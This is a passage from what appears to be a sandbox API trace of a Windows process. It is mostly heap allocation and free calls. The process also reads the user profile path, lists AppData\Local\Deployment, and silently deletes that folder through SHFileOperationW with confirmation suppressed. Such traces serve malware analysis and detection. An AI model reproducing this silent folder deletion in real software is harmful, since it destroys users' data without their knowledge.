lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0209.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.232] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0209.232] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0209.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.233] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240ca38 [0209.234] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Deployment", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", lpFilePart=0x8bedfc*="Deployment") returned 0x36 [0209.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0209.234] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment")) returned 0x2010 [0209.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5820 [0209.235] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0209.235] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 0 [0209.235] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0209.235] GetLastError () returned 0x12 [0209.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.236] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0209.236] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0209.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.237] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0209.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240ca38 [0209.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Deployment", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", lpFilePart=0x8bf658*="Deployment") returned 0x36 [0209.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0209.239] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment")) returned 0x2010 [0209.239] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x2